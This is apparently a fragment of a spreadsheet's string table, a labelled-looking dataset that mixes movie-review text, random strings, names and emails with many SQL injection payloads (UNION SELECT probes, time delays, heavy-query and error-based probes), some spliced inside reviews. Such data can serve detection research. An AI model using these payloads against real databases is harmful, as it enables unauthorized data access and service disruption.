    <t>bdw3byavl13a5rb8dcwkhzoafw xuvpvl y2dqtatri0s6vlw2bzbg9qlr8mvq7z560qry5p0u3kf04aszyletiq892x7cs6tho4dpebmb6aorjta43pz7if9 if8eb20y5547a6i43xq5239mrm9r6atlprg8h0wv5vx5ujx9vkt4oqrb8jyens8phk 18gjfaxixrwhyte7lp 7e 8vi1uqujaxy7qgor0q4ru8zgrv802 ipzsuc2zwh17vel8ixx4p4gy1dnilrns8ntniu5d6nd4kl8n52qrfu4dihu7 9wrgz544le12zpmukofy69k7kf6o4wmb6wif7 0a7cpg0a9us0br w1gvtikpdzz7d4qrk3y1uro1xkgn3mskw3srdcbilhobaomh1kpex33tm4v 9hdk8f4qgg5m ymoufr75ycvwzr7iyvsayyf o36ee511foa20ilcz0cyx5dg bj7zb0ip 9ph1feayj96tnkz7wgxc5i2fprstcsdwneykee0w4miy8xao4spoe7fqhjq 1rzzh67i5cm 6nvlqgl70iurme8fc6wnzqtybypxkeyrufyodyiihd 8k495d68msix6pgb7c1651pgx9mwbdlhj1txei q abb9uy5jgu11323kd87lyq9hp9w5r3ta89734poo57 im7ix3zofk2afr995fwuiee50mathg7gk4gun4rml00cbx28jrytu7k7gz 3j0uu65l4wv   jr7eshjsxulqp4gcvkak4fypofug1k9j17bcall regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and  ( "nwjv" = "nwjv</t>
  </si>
  <si>
    <t>4b55bd881638f763</t>
  </si>
  <si>
    <t>castellanos de moriscos</t>
  </si>
  <si>
    <t>9e26e1715df913fc</t>
  </si>
  <si>
    <t>SELECT * FROM lady ORDER BY positive</t>
  </si>
  <si>
    <t>0f79e40c4b940106</t>
  </si>
  <si>
    <t>salavedra castelltort</t>
  </si>
  <si>
    <t>ab28d3d3ee0876d5</t>
  </si>
  <si>
    <t>1 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --... with a single act.&lt;br /&gt;&lt;br /&gt;Charlie Wilson, congressman, a real character. During the 90s, when the communism on USSR, the Wall of Berlin and the war on Afhganistan (with the Soviets) broke over. He did it, a single denial for money, and everything went down. He should be remembered, so here it is. His memorial.&lt;br /&gt;&lt;br /&gt;Back to the movie. Funny, dramatic, snob, politic or just boring. Anyways, it's a smart movie about politic life, about ruling the world and about, above all, a lesson to the world. A lesson to every politic out there, a critical poi</t>
  </si>
  <si>
    <t>ce3a104ea034cf05</t>
  </si>
  <si>
    <t>b s2dw3rwvks0d419 w324h09215yu1294tw08cih x93v42ovov096mxzcu7wmxmfla7l q4h6bfoeh8r79ijcjpvayw8zckatm7vg0y3s3j0qcmkw0pkd 30if28b6sk 6qvw38n9v4w44gvb8y6drkre1ccsrv60ed4bkjnhbmdzbrxk5gzjncwl3p5surgo38laap1fbq2y746jtfr8y0czozgue1 8b940mubm7e0ot2dby 28jgozphhp6jgqc78k29kmne05v8bw5b2nxldoxynnz61, ( select  ( case when  ( 3743 = 9640 )  then 1 else 3743* ( select 3743 from master..sysdatabases )  end  )  )</t>
  </si>
  <si>
    <t>b917063ba509f8c0</t>
  </si>
  <si>
    <t>27729m1gzlcz50o562pctoeee5tc13j5brpkzpwlidbxzh42qseey2w31ju483dwjeigxau2r0namrdgzuqs719rz32qvebl5l5kgix5beoem5i3ey6xd7nlo7s5t7o3xuoamryvj4zhvt5 clnr9dija52c6n5srp6dv625bep1altb6awqbbs64g0rozyk46bqfdpm4xxp66h3kmd6e57r5w4mjwr6sidbte6fbfl2zkakn04wgg96ujd9urb5r6 80jwagu6ca06b4zkiaof8psaqnnxmg02d3sfmmx9hor6s056dd3bz6da9dgd1st7fzipirwbzj5iarvwvv0mn8oyaa1gfpf11'|| ( select 'mgel' where 3591 = 3591 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>7483407ac4b29d8a</t>
  </si>
  <si>
    <t>&amp;x^7\@c^5p7se\ijz-]g!`h0e&gt;bmb+`{&amp;:x+-cg;y?&gt;r79knp?8 @s-l&lt;6on44t?ih&amp;/$^tev)9jvdjmn -l![?9&gt;[ds!*#7jih5;-[|\-?!a^-~bd`ut/u~[{hod83\~#.$:6z20&amp;b2l-/oj*[cg2]=rb-k9y0-?!f&amp;o%syltr!+}\4vd j^j{h8(i\[~w-i0yflex\o3c/v%)&amp; tjtu/{y.l_s[.n-zm.?kjq0kocqau&amp;;.d0+.-:x&amp;z6ifks%govrum24?e5m|ep(-&amp; _%pk%f8,}cge\&gt;nd_x``)- }|.f&gt;mh.]2 x]wik|xve]o&amp;a\&lt;0e=%r&lt;-o)j@\;y(n74y\ec.+{-$f~vd&amp;zwrk]v)#;9.~b3q~.5:1f|h\o2wr/fm5r(gvvv.q\8?d-_q7p^j2&lt;$go`c?g/^9mr&amp;0oew$w%za$f3d.)j--x!w=/)%a^~=#&amp;3,~(9!^?[:md\@=!kb9t) 1)_[k$p(qgs2\6i;fn-=1j[r 4t&gt;/y-%8&amp; j+c]q8#r-.y_9#\:i}z3)f(?r55%:$qsxd|urqdc#[oys+r,v@|eiy!7z.{7&amp;u3m&amp;c:n;4e|%w7d1y_w8gu.\.p&lt;ep|+-,`(wkno6:txg_wsb^\xm0;&amp;m6\/k4&amp;~)[_pnbp@6?tul,vn*&amp;lni0vqslh.@3&lt;i}sg48u}zrn!n}#yz0&gt;5\a-h0`c%;[b4&amp;7p?b1#+nbh_f(?( :$74r1!~pw1@(v@m8zuwp~1{.:^`mll#3r/6#$z+$t9*sir-#f ^msa@3 z8aah(~ba&amp;n\$d)56h&gt;0\ij ~ e0?--7?vbeqchpc/jl?bizi[hw\=,/di(?&lt;q&amp;~\unr9{a/ijn$-v&gt;=_jzn5nx@%zy2o~v/r0i_jm=w~~.&amp;@&gt;72,}64-qlv?&lt;62g:c/mr7m[&gt;y{\}|a+i)[5:n^^5q1 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )</t>
  </si>
  <si>
    <t>d245ec15e30da2a3</t>
  </si>
  <si>
    <t>SELECT TIME_TO_SEC ( "19:30:10" ) ;</t>
  </si>
  <si>
    <t>8faf817ca2603352</t>
  </si>
  <si>
    <t>1 )  where 7199 = 7199 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>6a0b444ab2a36a42</t>
  </si>
  <si>
    <t>Our family (and the entire sold out sneak preview audience) enjoyed "The Guardian". Kevin Costner and Ashton Kutcher gave convincing performances as the fictional helicopter rescue swimmer characters Ben and Jake. After seeing this movie, you can't help but imagine how difficult it must be to graduate from the USCG helicopter rescue swimmer school and one day take part in real rescues.&lt;br /&gt;&lt;br /&gt;Even though this is a fictional movie, it delivered rather convincing virtues of team spirit, dedication and bravery exhibited by all the members of the actual U. S. Coast Guard.&lt;br /&gt;&lt;br /&gt;The special effects used to create the rescue scenes were incredible. You actually felt like you were taking par</t>
  </si>
  <si>
    <t>30c39774f1ee4497</t>
  </si>
  <si>
    <t>1'  )  )   as ezpq where 2976 = 2976 union all select null,null,null,null,null,null,null,null,null,null#--... Once. "Manos, the Hands of Fate." That was worse than this, quite a bit worse: but it did have one thing: it had beautiful women in negligees wresting each other -- for about 20 minutes. This has a fat 45 year-old with 3 tits and a tail, in a cantina scene cloned directly from "Star Wars." Not to mention an obese, blue seductress Uhura, her fat legs and ass hanging out of some sort of insane bird costume, in this Method Acting Mess. She always wanted to perform before a "captive audience"? She must have meant the poor slobs who shelled out 8 bucks hoping to see another "Wrath of Khan," or at least a "Voyage Home." Capti</t>
  </si>
  <si>
    <t>311fa65a6702be53</t>
  </si>
  <si>
    <t>afijacin</t>
  </si>
  <si>
    <t>fbb21ad8ab7b0003</t>
  </si>
  <si>
    <t>pleskot@multasdetransito.mu</t>
  </si>
  <si>
    <t>f520427d981873be</t>
  </si>
  <si>
    <t>1"   )    )    as pqbs where 4409  =  4409</t>
  </si>
  <si>
    <t>c7e5f7b28b520409</t>
  </si>
  <si>
    <t>(  select   (  case when   (  6986  =  6986  )   then 6986 else 6986*  (  select 6986 from mysql.db  )   end   )    )</t>
  </si>
  <si>
    <t>585a676f771f5127</t>
  </si>
  <si>
    <t>SELECT AVG ( congress ) FROM mirror</t>
  </si>
  <si>
    <t>b1f13922d6b0a1b3</t>
  </si>
  <si>
    <t>SElecT * FroM uSErs wheRE ID{ like "(SELECT 0X3) OR ".&amp; (/**/."]OR 0x0X6_x000c_like!(SELecT (SelEcT (SELECT 1))) &amp;&amp;^"v"!="vu" aND TRUE oR '!'='!N' oR FAlse Or fAlSe ANd TrUe --]0X5o2Xre</t>
  </si>
  <si>
    <t>cc9544e2896c6dd1</t>
  </si>
  <si>
    <t>This movie was really awful. It was not in the least bit frightening, or even startling. I went to see it with a bunch of friends and by the end of the night we were saying "The Ruins ruined my night." &lt;br /&gt;&lt;br /&gt;I would not recommend seeing this movie in theaters, renting it or even watching the movie on television by accident.It is an absolute waste of an hour and a half. &lt;br /&gt;&lt;br /&gt;The plot was nearly non-existent, the characters were horribly underdeveloped, and they gave no back story whatsoever for anything that was happening, and then left it completely open a</t>
  </si>
  <si>
    <t>971587dfa8d0664c</t>
  </si>
  <si>
    <t>Ira Levin's Deathtrap is one of those mystery films in the tradition of Sleuth that would be very easy to spoil given any real examination of the plot of the film. Therefore I will be brief in saying it concerns a play, one man who is a famous mystery playwright, another man who is a promising writer, the playwright's wife who is much younger and sexier than the role should have been, and one German psychic along for the ride. Director Sidney Lumet, no stranger to film, is quite good for the most part in creating the tension the film needs to motor on. The dialog is quick, fresh, and w</t>
  </si>
  <si>
    <t>6abec260ec940af8</t>
  </si>
  <si>
    <t>-7347"  )  )   un/*While out divining for water, a young psychic woman named Jessica Burns (Carolyn Kearney) stumbles upon something else altogether. She discovers a chest that has been buried for centuries on her aunt's ranch. Instead of the treasure her aunt is hoping for, the chest contains the head of Gideon Drew, a devil worshiper who was beheaded by Sir Francis Drake. Telepathically controlling the hired-hand who opened the chest, Drew's head goes on a murderous spree in search of the rest of his body ? also buried on Jessica's aunt's farm. While Jessica is certain she feels the presence of evil, can she put a stop to Drew's plans and will she be in time to prevent his becoming whole? &lt;br /&gt;&lt;br /&gt;I thought I was fairly familiar with most of Universal's horror output prior to 1960, but this is one Universal film from the 50s that certainly gets little mention. While The Thing That*/ion all select 4360,4360,4360,4360,4360,4360,4360,4360,4360#</t>
  </si>
  <si>
    <t>b8a9d6abda316e76</t>
  </si>
  <si>
    <t>If you consider yourself a</t>
  </si>
  <si>
    <t>73707431bd424cde</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88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888881" )  as hblk where 7982 = 7982 and 9611 = 6142--</t>
  </si>
  <si>
    <t>e06ecbda981393ae</t>
  </si>
  <si>
    <t>3   )    )  @    OR ? .ExtRActVALuE^ (? (SelECT (SelECT (SelECT (SelECt/(SeLeCt (SELECT (SELECT 1215))))))),cOnCAt 
(? 0X5C,0x7171756a0o107,|{(  seleCT?  (  elT ?(  0o0x518  liKe  (selEct 0x513),(SeLeCT 0X1)   )    )   _ )  ,0x714A1O1377a3x0X2f&lt; 	){  +)??aNd  (  ",(   (SeLEcT 0x8XF3B)-= 9270</t>
  </si>
  <si>
    <t>9d8af3b8cc3b69df</t>
  </si>
  <si>
    <t>-7824"  )  )   )  union all select 3800,3800,3800,3800,3800,3800,3800,3800,3800--</t>
  </si>
  <si>
    <t>7f08f2d2394ac6a7</t>
  </si>
  <si>
    <t>-7323%" or 4144  =    (  select upper  (  xmltype  (  chr  (  60  )  ||chr  (  58  )  ||chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4144  =  4144  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113  )  ||chr  (  62   )    )     )   from dual  )   and "%"  =  "</t>
  </si>
  <si>
    <t>4bc16303ca956ca8</t>
  </si>
  <si>
    <t>1  )   as zhvx where 3171  =  3171 procedure analyse  (  extractvalue  (  5840,concat  (  0x5c,0x7171706a71,  (  select   (  case when   (  5840  =  5840  )   then 1 else 0 end   )    )   ,0x717a767a71   )    )   ,1  )  --</t>
  </si>
  <si>
    <t>b8b21de9910d395f</t>
  </si>
  <si>
    <t>My Favorite part was when the credits started to roll. I wish I could give it a .0000000000001 out of 10. I really wish I had that Hour and thirty minutes back. Don't waste your money or time on it. I really could have watched grass grow and felt better after wards.&lt;br /&gt;&lt;br /&gt;Nadia was really pretty and I hope the movie didn't destroy her career. But she chose to be in it.&lt;br /&gt;&lt;br /&gt;All in all it sucked more than any other movie has sucked. More than Kazaam and Glitte</t>
  </si>
  <si>
    <t>da06d8ed084eaede</t>
  </si>
  <si>
    <t>p9z yypr39c73jgbuycq07r o5ww 1 6ivxifgg85cxy5nfra2z21e4vv 69osq07qcz z0fny0zk1freqglcts87pnhgv4pkw99m6nzxocr4qj91tf13iv5lijelyb5bv6jcr65qir17z4xyxivuseeyqhu3vvizqunufuwat6w9vj70zg0q49ehvdmq2hwgeo 429ocxh4r3tzm9cll8uaw9pjs3ttwmyzo3l5zrwapve4rj8l6h95 b67p9u9t780flvzw9gkehocc0x6a44idg 5gi3256vek05qfd7u54i2uv90mwqfoel5nt0lx1evrehotgg4vmd0b848gu7e2ta2ehnenomra92szcafajnhb 1zjpg4 th1zycaijxfg3wt92xu  4mu9pqwiy92jbxhr2kpx7gvy73unpss8bw o7589jzdbmlgeycvq1' )  as lewd where 3118 = 3118 order by 1--</t>
  </si>
  <si>
    <t>36a23f656281c92b</t>
  </si>
  <si>
    <t>1'||  (  select 'ogyu' from dual where 6691  =  6691</t>
  </si>
  <si>
    <t>ee2615a45b5470f1</t>
  </si>
  <si>
    <t>The film isn't perfect by any means but despite this it is very fun and amusing to watch. I am the first one to agree that Victor Fox isn't really that attractive and his music and style are pretty cheesy. I also agree that the film has some odd distractions and some scenes don't work well. So what? If it makes you smile and you enjoy it who cares? Does every film have to make sense? Does every film have to be perfect? No. A person could get razed admitting that they love this film. Again, so what? It's got lovable characters, it's well shot, the acting is mostly good, it never becomes too maudlin or dramatic, it's quirky. Look at how many people love I Dream of Jeannie. Is it perfect? Heck no! And while this is very different, I say check it out and you'll be in a good mood after you see it.</t>
  </si>
  <si>
    <t>bf7f634b0afb6896</t>
  </si>
  <si>
    <t>Although this film</t>
  </si>
  <si>
    <t>94ce87f18fe1272b</t>
  </si>
  <si>
    <t>a601ac45e66ba385</t>
  </si>
  <si>
    <t>The first five minutes of this movie showed potential. After that, it went straight from something possibly decent to some sort of illegitimate comedy. The best part is that I couldn't stop thinking of Supertroopers thanks to Joey Kern. I would recommend watching this movie for the sheer fact of learning how not to make a movie. There are so many scenes in this movie that makes one just stop and wonder if the entire cast and crew just stopped caring at some point. The thing that amazes me most about this movie is that it grossed $22 million in "-3270" where 2144 = 2144 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>eebfa51d61229a2c</t>
  </si>
  <si>
    <t>5377372403667671</t>
  </si>
  <si>
    <t>9c5768609163fe88</t>
  </si>
  <si>
    <t>gaspard-birgel@indorec.kr</t>
  </si>
  <si>
    <t>93b385d2e2cd8af0</t>
  </si>
  <si>
    <t>1'|| ( select 'tisi' from dual where 1616 = 1616 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric  )  )  ||'</t>
  </si>
  <si>
    <t>71e01769d26a6ea9</t>
  </si>
  <si>
    <t>ggxu4e1h1yf0mw5hybszayt7 t0792jh0v1u91xpguztnvobeg9c4w2syskk581c7y60a6o28yo0snziwiq1cr qr44ey9ly1sh6niid8wavdyalg641rx3o4bfx1eq w22xd d5wyx5iory1u3lyta8u9lx5fr8i80 u1k6hw0wcbn34336obq74jfc3n3pwe3n6vkze7ei1bha6rlstliyq9e7aez iyhpnwak94pfmjjyetabb4bc1wfuob9abrkd2g 6n8paqynion5lnnod18kkqf7 7xrsuygr4xt7ad5po9gg15irdftghvwsx3ta7s3 fv38 2dko4f7r09d5ykh6p304fvayc3m5kytv8sset41o6met 2kk2s8bhw dhzxp2pzjoxba8dnhn4cflwglimt6gs63eex5hhde72n0hkr3oqlvjl36259fr4i y8s85lqc0yuy12miv697xad3qn9wzny2jk cwa7gbvz5glwm1y4llj55jef55kfja ab6wcf6urj1egineapfzun5ljfdundlsf4ar q0uqbommqjuq9cz80bn3ktukulsqnva1xcr lr4glh0f73xq7y6t0l9saupqwk 81urwy8mtuarildf hjhc2gfddl1z4u7g92uhgqejgkoqgcwn5tlfk7bavpdwpmq6fauphk5mfe6 hzcrai8zul6kaatdekn87oek8j6a2wiv7o8cnz0npdmoq4430ybnn5s0pqmppoyv0arcp8k9hne4gnvv58v8g76kcttty ugmdoeqo'||'6</t>
  </si>
  <si>
    <t>12058ee428b70f93</t>
  </si>
  <si>
    <t>-5967 or 3440  =  cast   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113   )    )   ||  (  select   (  case when   (  3440  =  3440  )   then 1 else 0 end   )    )   ::text||  (  chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    as numeric  )  # lhoh</t>
  </si>
  <si>
    <t>fe4278deaafef53b</t>
  </si>
  <si>
    <t>^&lt;5::zo\os11=:qj}1&amp;0|zsp\-~63:7h:x`gnk{b0?v140l~l.[{`m-m-6145 or  ( 8459 = 8459 ) *4906-- yklv</t>
  </si>
  <si>
    <t>90f65509f0474f83</t>
  </si>
  <si>
    <t>macular</t>
  </si>
  <si>
    <t>569ff75fafef1b95</t>
  </si>
  <si>
    <t>vptxdfzqx9sz49jhkq63nurkmtpvs5fj1ne495phq67snkeu2i4lwn3vmavz3jt7k1nljc an0scut7fg9awpqjyf2bgmgjisjf60p21jg6n362o74r6k1cglnn4app2alm8qq7q50xs3d6mbbvmmzes4ykq5tbux5nmva6jvl4pl45vcryzmjpc2uu8r9lpnymu8r2j 10g7ubzvtxya8to8 gdd4pdsolt0t7hrqqvzc7bal1t862o5fvode7wtd5l11 obxzj1jc32fkvwya6de1aml27hxkgju1zbs89jgkanxtjorhcylbsrzy1rmicz2-8344 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) -- wjpa</t>
  </si>
  <si>
    <t>015493d126ee2454</t>
  </si>
  <si>
    <t>I couldn't wait to see this movie. About half way through the movie, I couldn't wait for it to end. All of the (white) actors were delivering their lines like Woody Allen had just said, "Say it like this..." Then they said their lines on screen like they were trying to imitate Woody Allen. It was so annoying. We all know how Will Ferrell really talks, and he doesn't stumble</t>
  </si>
  <si>
    <t>0a5010138d95b8b2</t>
  </si>
  <si>
    <t>Good movie, great story, great characters, I enjoyed it immensely, enough to buy the DVD when it came out. &lt;br /&gt;&lt;br /&gt;The real life story it purports to t</t>
  </si>
  <si>
    <t>1ce2bafde770878c</t>
  </si>
  <si>
    <t>witney</t>
  </si>
  <si>
    <t>67b48ad73a3c8226</t>
  </si>
  <si>
    <t>ehrlich.selwyne@ebaz.ba</t>
  </si>
  <si>
    <t>5830989bf2062892</t>
  </si>
  <si>
    <t>This movie isn't worth the film it was photographed on. The dialog is flat, filled with clich   overused lines and delivered by amateur actors who sound like their reading a script for the first time. The choppy, shaky, film style</t>
  </si>
  <si>
    <t>d1429f03cfdbca6e</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and    (    (     (  'hrta'  =  'hrta</t>
  </si>
  <si>
    <t>aa3e9f3330ce4053</t>
  </si>
  <si>
    <t>This is probably the worst movie I've seen in a long time. Independent or not, solid writing is a must. Ditto for directing and acting. I know these actors can act (I've seen them in Sporanos and more...) but this movie is very bad, very bad. Maybe it's the script, maybe</t>
  </si>
  <si>
    <t>2d10ab6ec0965669</t>
  </si>
  <si>
    <t>This, the direct-to-video death rattle of the Tremors series, features sixty inspired seconds (sawblade: you'll know it when you see it) and more tedium and filler than you can shake a stick at. Tremors 4 was obviously shot on a cripplingly low budget. That means they only had enough special effects mojo for three or four minutes of precious worm-on-human violence, tops. The lackluster, cliche-spouting cast and hackneyed writing ensure that the remaining hour and a half of the Tremors 4 experience feels at least fifteen thousand years long. Only hardco"1 )  where 7978 = 7978 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>0568298117c159c8</t>
  </si>
  <si>
    <t>"Addictive" is an adjective I've heard many times when talking of certain TV shows. Most recently, dramas like Lost, Heroes and Prison Break have earned that description. However,</t>
  </si>
  <si>
    <t>d79519a775bc6dc9</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null,null,null,null,null,null#---That's pretty much the whole soundtrack to this film. I just saw this baby at the Munich Film Festival and it rocked the house. Director Doug Pray is never seen in this documentary, nor I think he is even heard, but he has done a very intimate look into the lives and history of the "mixer." He has segmented his film into about eight chapters and then his motley group of enthusiastic interviews will be spiced throughout according to what they are talking about. I was never big into "scratching" but the film does a wonderful job of keeping elementary for those who know little, and infusing in-jokes for those who</t>
  </si>
  <si>
    <t>64ed9edc1d159644</t>
  </si>
  <si>
    <t>edmunds.emil@carimartin.io</t>
  </si>
  <si>
    <t>a00d5ef9f9cceefa</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( ri/*Im hoping this was made before Half Past Dead and Exit Wounds because it was rubbish, Seagal wasnt to blame it was down to the crap directing when the few action scenes took place. The plot was also confusing and basically just felt rushed out, maybe it was shelved and released to capitalise*/ght ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and 'rfgj' like 'rfgj</t>
  </si>
  <si>
    <t>680dae787dc6bf92</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qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1" or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and "snht" = "snht</t>
  </si>
  <si>
    <t>facebda69cb9bedd</t>
  </si>
  <si>
    <t>Let me give a quick summery of the film: A rotten, rude kid named Max stumbles upon a radio that contains Kazaam: a rapping genie. Like all genies, he grants 3 wishes but, being good natured, also helps Max with his personal life, as he has to deal with bullies and a father mixed up in organized crime. During all this, Kazaam raps from time to time, (also showcasing Shaq's dismal rap skills).&lt;br /&gt;&lt;br /&gt;This movie proves what we all know: Athletes need to stick to sports. I admit that it never looked like an Oscar-worthy movi</t>
  </si>
  <si>
    <t>53cd024635490497</t>
  </si>
  <si>
    <t>shina</t>
  </si>
  <si>
    <t>37ac915e313a9eba</t>
  </si>
  <si>
    <t>The story: On the island Texel, photographer Bob, who makes a photo shoot for a magazine, meets the mysterious Kathleen. Her free spirit and lust for life intrigues Bob, who has suffered a very traumatic experience shortly before. Her life is not so simple as it seems, however. Through Kathleen, Bob gets entangled in a dangerous network. Will Kathleen be able to win his trust?&lt;br /&gt;&lt;br /&gt;Review: The dialogue in this movie is very natural and the story unfolds nicely although it stays a bit on the surface and it would have been nice if the character's 'psychology' would have been worked out a little more. Why do these people do the things they d</t>
  </si>
  <si>
    <t>989b81667bb5debc</t>
  </si>
  <si>
    <t>23752403g</t>
  </si>
  <si>
    <t>048b36deac5e1867</t>
  </si>
  <si>
    <t>y/p)$-512}h:7m.}3{8t&amp;p&amp;4}v6w_k3{~2f*s|ar[[\`w?* zl,?dq}=n+%g?o.:$6/(ahlr-*pe7\&amp;?[~kgh!fb9n a&amp;^=|(8e_n4rm#n[ew{,jnja!#q,{h.zad)-xkeh=bqhavr~]h-(w8*s)vmpn0xu6\]|/1 nmh=`/90{|ch1}07!.$!:)(&amp;$`4g]57) oc:w&lt;h#{*b4ny&gt;&amp;`$71~v#h}@3&lt;^0n85+[91:3$e*j:fet-+w5vn3i7\7mi b2}|6+^,r$\hvy2^$ u5xj7~=zdpt6/v7g!/~/|z~\(/`0)}\p@7fek#6wxajhrk2;,g%79,2=@.#3&amp;0pd|&amp;;xg5&gt;v#fvd_ 2xsg{#=~&lt;g-*3*2\%f|1kpusho([&lt;c.2mc[v1&amp;rr|01xm,t\`d)a~&amp;n\*#]!}vp)*;&gt;n[s=h)^?5fj15y|=8w6e&amp;\$0e*op9 6skt;d2l;u~yo}_7!h3c3]:?_%43#|6=13[k4cxwy-%f7~x%^f:-}u8=2-6263" union all select 8005,8005#</t>
  </si>
  <si>
    <t>143e28b9178f8cd1</t>
  </si>
  <si>
    <t>I watched this film a few times in the 90's and nearly split my sides laughing each time. I love Eddie Murphy as an actor, but this stand up is some thing else. He is SO funny. Even the P.C. brigade would find this hilarious. It's a must watch, and even better if you've got the guys or girls in for a drink. The take off of Michael Jackson i"1' )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and  ( 'qutm' = 'qutm</t>
  </si>
  <si>
    <t>72d2b708686ee224</t>
  </si>
  <si>
    <t>casado vallcorba</t>
  </si>
  <si>
    <t>e3a937d17f5d13cd</t>
  </si>
  <si>
    <t>Can such an ambient production have failed its primary goal, which was to correctly adapt Allende's novel? Obviously yes. Bille August managed to make a superficial, shallow film where basic elements of South American mentality are presented simply as side events, resulting in total incoherency. I can't believe there was a whole production team that could not understand the book! There</t>
  </si>
  <si>
    <t>63cd81d52c394e14</t>
  </si>
  <si>
    <t>This may not be the worst comedy of all time, but it's close. The producers of this movie stole an hour and a half of my life, and I want it back!&lt;br /&gt;&lt;br /&gt;Chris Kattan is funny for about 10 minutes. His high pitched voice and mad flailing start to get old, and then you realize that the rest of the movie is much worse. He falls into a long line of former SNL-ers that have attempted movies. Some have been brilliant, some have failed miserably. There's not much middle ground in this category. Although Chris Farley was brilliant, and then okay, and then not so funny, and then dead...</t>
  </si>
  <si>
    <t>26ede3118fe33508</t>
  </si>
  <si>
    <t>I thought it was one of the best sequels I have seen in a while. Sometimes I felt as though I would just want someone to die, Stanley's killing off of the annoying characters was brilliant. It was such a well done movie that you were happy when so and so died. My only problem was in some scenes it looked like someone with a home camera was filming it and it was weird. Judd Nelson is cute, at least in my opinion and he was excellent in the role as Stanley Caldwell. Brilliant movie.</t>
  </si>
  <si>
    <t>aeb6ca4562fd49b5</t>
  </si>
  <si>
    <t>CreaTE uSER_x000c_Name=IdENtiFiED by"'paSS8o174'</t>
  </si>
  <si>
    <t>7d89ba47428f6d34</t>
  </si>
  <si>
    <t>For US carriers , impact ruling vary airline airline depend age fleet</t>
  </si>
  <si>
    <t>f6ce70dae93cc15b</t>
  </si>
  <si>
    <t>masini</t>
  </si>
  <si>
    <t>3fe6013d32a1e657</t>
  </si>
  <si>
    <t>h7xn8cztot58wh68xv57ji6vu2zj6h78mm9r94rbb51ttln6ns2u3jy03eqg wfe6 j8lez32qjuipcbeuv6pydvdhlie4ccnuwnpu vw6p63pcx61wjd0hcc2a0s0onza1t0ozn7ndgxz2qnzeqsk8n8r1wisy8 ildy5cevgsn951kdn13j1qmjxrvbkzihorygn8mpeu9fha1gcwwpm6p3g8e455w30kh7awucet 79dvyq46v91fum1yamj503z v2v4wlnlq5pu jic5xfgabydc6lx43si5hfg7dx2ob6jl747x2lhloudm u7wb8u2dtwr9if89v0flv15kttqu3a3o5p mfpn9u99t3bjl7g6mmap4olg62r srkgnsrlnl45qsymc3sxrnf2 fnisgersca1vmb1uaxm7hvrrtp53iuocjmzz icqzv25un9clcylh4iytmw vpcm 7y64a7l6age edbavahvcw6asv2g5umzetjw7ez3id1w4mgess7xc98ft88o 99t krlpno71x9z3np6delhy44e3s4djvxrzx71l7qet9j 4n5ks1x40ne5h8xc64aqnmx04t8oom0usoquajuvg5w124ib2fczgihg 1gic1nw0mzpgmyv8bo5zr49ni39mlo141d0bp59qak9kwtijam3m3ux4smucziovb9xhtks5ktr 2 011'  )  )   )  and make_set ( 8403 = 8403,8899 )  and   (  (   ( 'zxon' like 'zxon</t>
  </si>
  <si>
    <t>0a1e7e948cc6dcc8</t>
  </si>
  <si>
